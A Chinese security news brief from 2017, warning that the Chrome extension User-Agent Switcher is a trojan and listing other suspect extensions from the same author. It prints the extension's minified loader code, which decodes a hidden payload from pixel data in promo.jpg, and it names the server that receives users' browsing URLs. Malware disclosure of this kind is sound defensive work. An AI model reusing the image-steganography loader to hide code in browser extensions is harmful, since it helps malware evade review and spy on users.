安全動(dòng)態(tài)

快訊 丨流行Chrome插件User-Agent Switcher為木馬程序,請(qǐng)盡快卸載
來(lái)源:聚銘網(wǎng)絡(luò)    發(fā)布時(shí)間:2017-09-10    瀏覽次數(shù):
 

信息來(lái)源:FreeBuf

剛剛曝出的消息,Chrome商店搜索User-Agent Switcher,排名第一的插件居然是一款木馬程序!而這款工具,很多安全技術(shù)人員也都在使用。

這款插件的表面功能是使Chrome可以轉(zhuǎn)換為別的瀏覽器進(jìn)行訪(fǎng)問(wèn),如IE、Safari、360甚至iOS、 Android等移動(dòng)瀏覽器,方便用戶(hù)進(jìn)行測(cè)試。此外,User-Agent Switcher還可以修改瀏覽器的UA,支持自動(dòng)切換模式,讓Chrome始終用指定的UA去訪(fǎng)問(wèn)某些網(wǎng)站。

但是,這款插件其實(shí)是一個(gè)包含惡意代碼的木馬程序。打開(kāi)谷歌應(yīng)用商店(插件地址),可以看到其用戶(hù)數(shù)超過(guò)45萬(wàn)人,截至發(fā)稿共有1300多名用戶(hù)對(duì)其進(jìn)行了評(píng)價(jià),平均評(píng)分4.38顆星。

1.png

插件截圖

為了繞過(guò)Chrome的審核策略,其作者把惡意代碼隱藏在了promo.jpg里。插件的background.js第80行代碼,可以從圖片里解密出惡意代碼并執(zhí)行。

t.prototype.Vh=function(t,e){  

if(""==='../promo.jpg')return"";  

void0===t&&(t='../promo.jpg'),t.length&&(t=r.Wk(t)),e=e||{};  

varn=this.ET,  

i=e.mp||n.mp,  

o=e.Tv||n.Tv,  

h=e.At||n.At,  

a=r.Yb(Math.pow(2,i)),  

f=(e.WC||n.WC,e.TY||n.TY),  

u=document.createElement("canvas"),  

p=u.getContext("2d");  

if(u.style.display="none",u.width=e.width||t.width,u.height=e.width||t.height,0===u.width||0===u.height)return"";  

e.height&&e.width?p.drawImage(t,0,0,e.width,e.height):p.drawImage(t,0,0);  

varc=p.getImageData(0,0,u.width,u.height),  

d=c.data,  

g=[];  

if(c.data.every(function(t){  

return0===t  

}))return"";  

varm,s;  

if(1===o)  

for(m=3,s=!1;!s&&m<d.length&&!s;m+=4)s=f(d,m,o),s||g.push(d[m]-(255-a+1));  

varv="",  

w=0,  

y=0,  

l=Math.pow(2,h)-1;  

for(m=0;m<g.length;m+=1)w+=g[m]<<y,y+=i,y>=h&&(v+=String.fromCharCode(w&l),y%=h,w=g[m]>>i-y);  

returnv.length<13?"":(0!==w&&(v+=String.fromCharCode(w&l)),v)  }

只要執(zhí)行這段代碼,插件就會(huì)把你瀏覽器打開(kāi)的每個(gè)頁(yè)面的url信息加密發(fā)送到這個(gè)地址(https://uaswitcher.org/logic/page/data)。另外,該插件還會(huì)從地址(http://api.data-monitor.info/api/bhrule?sub=116)獲取推廣鏈接規(guī)則,當(dāng)用戶(hù)打開(kāi)符合規(guī)則的網(wǎng)站時(shí),就會(huì)在當(dāng)前頁(yè)面植入廣告甚至惡意代碼。

據(jù)悉,該作者還在谷歌應(yīng)用商店發(fā)布了如下幾個(gè)插件,其安全性同樣值得懷疑:

https://chrome.google.com/webstore/detail/nenhancer/ijanohecbcpdgnpiabdfehfjgcapepbm

https://chrome.google.com/webstore/detail/allow-copy/abidndjnodakeaicodfpgcnlkpppapah

https://chrome.google.com/webstore/detail/%D1%81%D0%BA%D0%B0%D1%87%D0%B0%D1%82%D1%8C-%D0%BC%D1%83%D0%B7%D1%8B%D0%BA%D1%83-%D0%B2%D0%BA%D0%BE%D0%BD%D1%82%D0%B0%D0%BA%D1%82%D0%B5/hanjiajgnonaobdlklncdjdmpbomlhoa

https://chrome.google.com/webstore/detail/aliexpress-radar/pfjibkklgpfcfdlhijfglamdnkjnpdeg

請(qǐng)大家檢查一下自己的瀏覽器,如有發(fā)現(xiàn)安裝,請(qǐng)盡快卸載。

 
 

上一篇:2017年09月09日 聚銘安全速遞

下一篇:微博官方發(fā)布公告:9月15日前所有用戶(hù)需實(shí)名,否則無(wú)法發(fā)博與評(píng)論